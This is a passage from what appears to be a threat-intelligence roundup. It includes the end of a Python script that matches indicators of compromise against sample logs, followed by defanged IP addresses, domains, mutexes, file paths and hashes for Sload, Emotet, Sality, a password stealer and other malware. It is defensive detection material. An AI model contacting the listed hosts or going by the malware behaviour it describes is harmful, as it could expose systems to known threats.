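    },
}

# Assumed expansions of the sandbox placeholders; '*' stands for one path component (the user name).
ENV = {
    "%WinDir%": r"C:\Windows",
    "%TEMP%": r"C:\Users\*\AppData\Local\Temp",
    "%LocalAppData%": r"C:\Users\*\AppData\Local",
}

# Which log field each indicator type is compared against.
FIELD_FOR = {"ip": "dst", "domain": "qname", "mutex": "name", "path": "path", "sha256": "sha256"}
KV_RE = re.compile(r"(\w+)=(\S+)")


def path_regex(template: str) -> re.Pattern:
    """Turn a placeholder path into a case-insensitive, anchored regex."""
    for placeholder, expansion in ENV.items():
        template = template.replace(placeholder, expansion)
    return re.compile("^" + re.escape(template).replace(r"\*", r"[^\\]+") + "$", re.IGNORECASE)


def build_matchers(iocs):
    """Normalise every indicator into (cluster, type, raw value, test function)."""
    matchers = []
    for cluster, by_type in iocs.items():
        for kind, values in by_type.items():
            for raw in values:
                if kind == "path":
                    rx = path_regex(raw)
                    matchers.append((cluster, kind, raw, lambda x, rx=rx: rx.match(x) is not None))
                else:
                    norm = refang(raw).lower()
                    matchers.append((cluster, kind, raw, lambda x, norm=norm: x.lower() == norm))
    return matchers


def hunt(lines, iocs=IOCS, min_types: int = 2):
    """Return ({host: {cluster: {type: [raw indicators]}}}, sorted [(host, cluster)] alerts).

    A host is alerted on only when at least min_types distinct indicator types of the same
    cluster were seen on it: one hit (a DNS lookup of a public service, say) is not enough."""
    matchers = build_matchers(iocs)
    hits = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))
    for line in lines:
        fields = dict(KV_RE.findall(line))
        host = fields.get("host", "?")
        for cluster, kind, raw, test in matchers:
            value = fields.get(FIELD_FOR[kind])
            if value is not None and test(value):
                hits[host][cluster][kind].append(raw)
    alerts = [(h, c) for h, clusters in hits.items() for c, kinds in clusters.items()
              if len(kinds) >= min_types]
    return hits, sorted(alerts)


SAMPLE_LOGS = [  # constructed for this example; key=value records, one event per line
    "2018-12-05T13:15:54Z host=PC01 type=dns qname=ipinfo.io",
    "2018-12-05T13:15:55Z host=PC01 type=dns qname=images2.imgbox.com",
    "2018-12-05T13:15:56Z host=PC01 type=mutex name=KYTransactionServer.MutexObject.Administrator",
    "2018-12-05T13:20:01Z host=PC02 type=dns qname=ipinfo.io",
    "2018-12-05T14:02:10Z host=PC03 type=file path=C:\\Windows\\SysWOW64\\YC4GWpe1p4Ot.exe",
    "2018-12-05T14:02:11Z host=PC03 type=conn dst=144.217.184.168",
    "2018-12-05T14:02:12Z host=PC03 type=conn dst=8.8.8.8",
]

if __name__ == "__main__":
    matched, alerted = hunt(SAMPLE_LOGS)
    for host, clusters in matched.items():
        for cluster, kinds in clusters.items():
            print(host, cluster, dict(kinds))
    print("alerts:", alerted)
```

<br />Run as a script, it prints the per-host matches and two alerts: the host that resolved both Sload domains and created the Sload mutex, and the host that dropped the Emotet executable and contacted one of its IP addresses. The host that only resolved ipinfo[.]io, a public IP-geolocation service, gets no alert; that domain is on the list because the sample queried it while gathering information about the infected system, not because it is malicious in itself, and the threshold is what keeps it from paging anyone on its own. The same threshold also holds back a lone file-hash match, which is a much stronger signal, so in practice a hash hit deserves its own lower-noise rule.<br /><br />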
For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5c0aaf2d47a8b.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and a single IOC does not indicate maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Xls.Downloader.Sload-6774021-0</b><br /> Downloader<br /> The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell script may then download the final payload or another downloader.<br />&nbsp;</li><li><b>Doc.Downloader.Emotet-6765662-0</b><br /> Downloader<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails and recently saw a resurgence around Black Friday.<br />&nbsp;</li><li><b>Win.Ransomware.Imps-6765847-0</b><br /> Ransomware<br /> This is a trojan that may steal information from the affected machine and download potentially malicious files that spread via removable drives.<br />&nbsp;</li><li><b>Win.Virus.Sality-6765491-0</b><br /> Virus<br /> Sality is a file infector that establishes a peer-to-peer botnet. Although it has been prevalent for more than a decade, we continue to see new samples that need minor attention to keep detection consistent. 
Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.<br />&nbsp;</li><li><b>Win.Packed.Passwordstealera-6765350-0</b><br /> Packed<br /> This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed. <br />&nbsp;</li><li><b>Doc.Downloader.Sagent-6766662-0</b><br /> Downloader<br /> Sagent launches PowerShell through macros in Microsoft Office documents. The PowerShell then downloads unwanted software from remote websites. <br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Xls.Downloader.Sload-6774021-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>KYTransactionServer.MutexObject.Administrator</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>216[.]239[.]34[.]21</li><li>64[.]210[.]137[.]102</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>ipinfo[.]io</li><li>images2[.]imgbox[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\psefaeec.nvt.psm1</li><li>%LocalAppData%\Temp\yb31jdzi.jxl.ps1</li><li>%UserProfile%\Documents\20181205\PowerShell_transcript.PC.ZR0bVMzf.20181205131554.txt</li><li>%LocalAppData%\Temp\CVR1B6D.tmp</li></ul><b>File Hashes</b><br /><ul><li>06f128b08f332142a5e0cb8d6c26a780316623ff62673684ccb9f37f98e3f87e</li><li>07b4dc36a3389ef60f3444bde94f6b9440e6cd2d658671096d01e4909a0044e3</li><li>0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540</li><li>132a3cf5d1534553294af816d2796d21c2a7a379eb3fbe6f67e8fda895a68a77</li><li>15c3daf032053b55a6bc280ddbdadfa668172a43609da78a421856b5f84f1381</li><li>24ccc8f6607e2577e1fa9e3f3cb474e6a309f420765bff7d64a38ba1c6a2d508</li><li>393326257ec1f08c2379a375308e0b5a6879ffdb8d68362f46a6a56f2fa9c0b1</li><li>3bfb9adbd0af64301780ae06f4db63fcceb21dad38a8df0f6023c60d51fc71ac</li><li>42728401a73b538b441d0643b302122f03960a26d8f2513af5a780e24bfe9817</li><li>511b09caf3e19d96a2e8606c35ef9e39e18903e7895ae225dd7807cd46d50c21</li><li>55e145df9b9668105f52c6f61e5ca6d421edf7fa1856af1162452a7dce6b6e3c</li><li>5dfe4ad7cc7866e81248aa06e2c8204f6007e9694a5d1a4d6739d9a313ed249f</li><li>5f8fd3edd5feaf3bf12702d0bec48df5710bac2770b59aedeec46c563f2f4df9</li><li>6a7e95ffccb39bce1203731899b14adba3afd79d7bda7f783256011c510ffd0a</li><li>74a2bd67f90c0d6d906286d4aea6de32bd9bfb05ac631de15b8429758573d22f</li><li>7559d01473ed8f6a5d101e39ca32f5d2a975a018a017100967417c5ca8f5f578</li><li>983b13f4ae9b8b9dbb6fd5e4fa024e862628bd748d2ece92cf4b4c2048d88ad7</li><li>b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a</li><li>d23817b23214e53ee9400e9a307b522add72c875d3c98ba397525ac11c963379</li><li>f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-c7QWMIAaUas/XAqkGKYa5xI/AAAAAAAABOs/XAfZUu8umDkBza6cUR22FChwZx64MIgOgCLcBGAs/s1600/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-c7QWMIAaUas/XAqkGKYa5xI/AAAAAAAABOs/XAfZUu8umDkBza6cUR22FChwZx64MIgOgCLcBGAs/s400/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/--EYepL2oGeI/XAqkLUiUdyI/AAAAAAAABOw/uaC6ndb3UHoL-5EPy4lukguno1NIXrBTwCLcBGAs/s1600/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/--EYepL2oGeI/XAqkLUiUdyI/AAAAAAAABOw/uaC6ndb3UHoL-5EPy4lukguno1NIXrBTwCLcBGAs/s640/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_tg.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://4.bp.blogspot.com/-WHdvtZarG3c/XAqkPsAm8WI/AAAAAAAABO0/A8BsxfmO8nU-_9MlDutsetEv3sXbpn0CACLcBGAs/s1600/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://4.bp.blogspot.com/-WHdvtZarG3c/XAqkPsAm8WI/AAAAAAAABO0/A8BsxfmO8nU-_9MlDutsetEv3sXbpn0CACLcBGAs/s640/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Doc.Downloader.Emotet-6765662-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\mwarepwd </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>144[.]217[.]184[.]168</li><li>198[.]0[.]36[.]237</li><li>162[.]220[.]11[.]30</li><li>216[.]198[.]175[.]99</li><li>71[.]179[.]135[.]10</li><li>184[.]168[.]177[.]1</li><li>72[.]167[.]191[.]65</li><li>77[.]221[.]130[.]34</li><li>179[.]188[.]11[.]22</li><li>74[.]79[.]252[.]106</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>p3nlhclust404[.]shr[.]prod[.]phx3[.]secureserver[.]net</li><li>ejercitodemaquinas[.]com</li><li>jsplivenews[.]com</li><li>dealnexus[.]intralinks[.]com</li><li>gvmadvogados[.]com[.]br</li><li>infobox[.]ru</li><li>chstarkeco[.]com</li><li>www[.]infobox[.]ru</li><li>www[.]legal500[.]com</li><li>g-steel[.]ru</li><li>www[.]gvmadvogados[.]com[.]br</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\GmP.exe</li><li>%TEMP%\GmP.exe</li><li>%LocalAppData%\Temp\hu3xyaa3.0rw.ps1</li><li>%LocalAppData%\Temp\mz5ranh3.2bk.psm1</li><li>%LocalAppData%\Temp\CVR2D3B.tmp</li><li>%LocalAppData%\Temp\~DFA8496BB3134EB884.TMP</li><li>%WinDir%\SysWOW64\YC4GWpe1p4Ot.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@gvmadvogados.com[1].txt</li><li>%SystemDrive%\~$4550683.doc</li></ul><b>File Hashes</b><br /><ul><li>0da3104bfc37f64817dbbb0f5fd699c19db913b2a2f5c6f883b0813f1669638a</li><li>1ca11cdd2bafbcd28491f6e46e1a2dfd9c435effb2ac941c7d164114d82d2aec</li><li>21694e71a6d384e5080e422ca98dd16a52c39e430bfdec1732b3706c480914e9</li><li>25fafc8f6d6819add0f2f907d1cf8a760ea0e4256b5a9997ebae705a7f40691e</li><li>434a1520a7608017e839ecd8804d04ef5d53d0b1dfaae1e8865383510cb314ca</li><li>46c708f3468052469785a18c61440521d05eeeb48625122b2f0879924fcf19a2</li><li>4e03038cd03633b18f289487b717e6f9b75315c382794c73943092f6a90d170b</li><li>6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921</li><li>6311b3f0767a57f8c7ee0c6e317fad84bc9d39a12e48f28505ecddc842a66095</li><li>8286c59c07e75f97219bf649077d3ea44f497e715376fa867fec38fc34917ae8</li><li>9248345ccc78b67a968c1f2082916ee58d0ce5642698a7a6e2f830f65937bc8d</li><li>95696fdc9073bbb5feb71da630fa3c1f2255c3f7025bce4bc2ce7a0bda261bdf</li><li>c060f2d8dc9a46d2805e514584fcdf02e39e2e56110c2ef0f0464e2ae40d3842</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Buwn_soM_es/XAqkjIzrtJI/AAAAAAAABPA/7JRE1oRmuMUKG09WOvrPhuHNY6KyrrGRQCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-Buwn_soM_es/XAqkjIzrtJI/AAAAAAAABPA/7JRE1oRmuMUKG09WOvrPhuHNY6KyrrGRQCLcBGAs/s400/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-AZFJ-e9wZ-8/XAqknEHSfJI/AAAAAAAABPE/rgnu3WsDAi87s6RfHoR050SPLnwzrUNHgCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-AZFJ-e9wZ-8/XAqknEHSfJI/AAAAAAAABPE/rgnu3WsDAi87s6RfHoR050SPLnwzrUNHgCLcBGAs/s640/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://2.bp.blogspot.com/-CJMuXGikSkA/XAqkrMJNtFI/AAAAAAAABPI/NvD7CHCifPoehvgGkIPay2pMcxRROsyogCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-CJMuXGikSkA/XAqkrMJNtFI/AAAAAAAABPI/NvD7CHCifPoehvgGkIPay2pMcxRROsyogCLcBGAs/s640/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-gpDFnu5sDFM/XAqkzsSiWNI/AAAAAAAABPU/9-gPcdXs0iAJtHqmmyy_eNXyVwlThYpSgCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://4.bp.blogspot.com/-gpDFnu5sDFM/XAqkzsSiWNI/AAAAAAAABPU/9-gPcdXs0iAJtHqmmyy_eNXyVwlThYpSgCLcBGAs/s640/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Ransomware.Imps-6765847-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Global\LOADPERF_MUTEX</li><li>DSKQUOTA_SIDCACHE_MUTEX</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>185[.]9[.]147[.]4</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>s142814[.]smrtp[.]ru</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\98B68E3C.zip</li><li>%AppData%\Microsoft\Network\srcc.exe</li><li>%AppData%\Microsoft\Windows\audiohq.exe</li><li>%System32%\Tasks\ApplicationUpdateCallback</li><li>%System32%\Tasks\System\Security\upjf</li><li>%System32%\Tasks\System\smartscreen</li></ul><b>File Hashes</b><br /><ul><li>504c6e964c591cd6b4aac5193600058863a5c3c3b9ae7e5756315114fb032a11</li><li>52691c9c33c0b2707d74cca5738a15313ccd5264279a20933886a1f4d60aaea1</li><li>6acf9095e1f5725380bdac7fd7d1d9f07fdb44daa4682c2c8ef001094252d699</li><li>8c84a6d109b529446bb89ae69175f848579699bfc0bcb6dd23a2cdfd31b48f43</li><li>8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db</li><li>982024167a8bc0e5f6fce2b476655b91c821d09f324f95e77f0d38358d1a881b</li><li>9c2d5ab12e6f67faae5444007b9135834af71cc5e23c53801fa39877b9068101</li><li>9c4780fa358ee65ac1f2361e1e2757f475674145977bfb8a43870538dd6f85ca</li><li>a3786fbfefcdec86bfb9ea1f4d14faa1285dab5bc846ba556b6b9ba3c974c420</li><li>ca7073947e41d18d30565366df2522f12bbeb0d4a856e1572d654a3d569bd3ce</li><li>d2482568a93e5755ff97a8a481e92db8d3f2e4995ee310645f9a1951a9075250</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://2.bp.blogspot.com/-BAYU0-ifAG4/XAqsRSU9HMI/AAAAAAAABPw/MsHUz4hzAgcPo2TL5XK7ZkKO2Q0g4aDNwCLcBGAs/s1600/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-BAYU0-ifAG4/XAqsRSU9HMI/AAAAAAAABPw/MsHUz4hzAgcPo2TL5XK7ZkKO2Q0g4aDNwCLcBGAs/s400/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-ryyGWiRxlTs/XAqsVgohW7I/AAAAAAAABP0/h66eV4utudoUTUjkQT05MY8D-WIQk9NgwCLcBGAs/s1600/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-ryyGWiRxlTs/XAqsVgohW7I/AAAAAAAABP0/h66eV4utudoUTUjkQT05MY8D-WIQk9NgwCLcBGAs/s640/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BTGjQkKhAn0/XAqscop3JUI/AAAAAAAABP4/PwIomPmFKkAR5bomLd4ac8SFCDZT-u_TQCLcBGAs/s1600/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-BTGjQkKhAn0/XAqscop3JUI/AAAAAAAABP4/PwIomPmFKkAR5bomLd4ac8SFCDZT-u_TQCLcBGAs/s640/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_umbrella.png" width="640" /></a></div><br /><br /><h3>Win.Virus.Sality-6765491-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br 
/><ul><li>&lt;HKLM&gt;\SOFTWARE\WOW6432NODE\Creative Tech </li><li>&lt;HKLM&gt;\SOFTWARE\WOW6432NODE\CREATIVE TECH\Installation </li><li>&lt;HKLM&gt;\SOFTWARE\Creative Tech </li></ul><b>Mutexes</b><br /><ul><li>csrss.exeM_328_</li><li>lsass.exeM_428_</li><li>smss.exeM_204_</li><li>svchost.exeM_840_</li><li>wininit.exeM_320_</li><li>winlogon.exeM_356_</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%System16%.ini</li><li>%SystemDrive%\autorun.inf</li><li>%System32%\CmdRtr64.DLL</li><li>%WinDir%\Temp\CRF000\APOMgr64.dll</li><li>%WinDir%\Temp\CRF000\APOMngr.dll</li><li>%WinDir%\Temp\CRF000\CmdRtr.dll</li><li>%WinDir%\Temp\CRF000\CmdRtr64.dll</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bkhxl.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pelbwv.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scih.exe</li><li>%WinDir%\Temp\CRF000\creaf_ms.cab</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlinwq.exe</li><li>%WinDir%\Temp\CRF000\mint.ini</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbdaue.exe</li><li>%WinDir%\Temp\CRF000\mint32.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbhys.exe</li><li>%WinDir%\Temp\CRF000\mint64.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbqckk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wincsbehn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfudq.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winimau.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjcsnxu.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkggnjk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkmdt.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintyttku.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Tem
p\winvcpbm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winxraoo.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xatik.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xovxjg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ydgy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ysrnph.exe</li><li>%System32%\drivers\oiihn.sys</li></ul><b>File Hashes</b><br /><ul><li>055dd786fbb1c16e793f806368aa0f05ab7ef45db767fe5a7a829f11da37da0a</li><li>14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f</li><li>1daef9e1a3fe804680acf7e0a64724d4c106fea7aba46d437738b7ab72cff59d</li><li>3b6a5842eeab177d8d869f8eac9aea7342cb1117ac063e4cc2e3c4298107b028</li><li>5d83a8691b914f3971c6b91e8c82803b479ae70756cfbeb987ddb842eb399d8a</li><li>88f585ed82535a991dee6b054caf7efd9f4bb54acdde8fdf7d05eba8997d1058</li><li>973dbe64453445eb82a2e619842f46c8ed3e6ca74533db582b472e79bc01601c</li><li>a28cd979f9395cc482d9de5d7fd676a379e97920a37784763bfb72f348556cdb</li><li>d746b850bf25ef3872d33c3b0067910b8d075a0bed0af89c3c14ecd2efee3fab</li><li>f2864685d01a793c2e76191d3be5278b6e1d59a9fb5b20e7a229e3d634108c8c</li><li>f6c27d2fdfed0a6b67e5aee197388797ef77a4cece21c849ac096d075dbd93c9</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-fnKt177UMPI/XAqs3JeXt2I/AAAAAAAABQE/W8-NYIm4uJQZB-5qgr0kEeOj1g2VO0jXgCLcBGAs/s1600/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-fnKt177UMPI/XAqs3JeXt2I/AAAAAAAABQE/W8-NYIm4uJQZB-5qgr0kEeOj1g2VO0jXgCLcBGAs/s400/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-jQT4O5kfrqY/XAqs6-lr5RI/AAAAAAAABQI/mPyOwNTzHhEwgYxlB5ko4sBhEe9dcKv_wCLcBGAs/s1600/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-jQT4O5kfrqY/XAqs6-lr5RI/AAAAAAAABQI/mPyOwNTzHhEwgYxlB5ko4sBhEe9dcKv_wCLcBGAs/s640/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-NCSxdnfOpmw/XAqtA79tJOI/AAAAAAAABQM/fZKYmQ9LpMY-zfFOhRU_wRSw4KZ-rsd9gCLcBGAs/s1600/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" 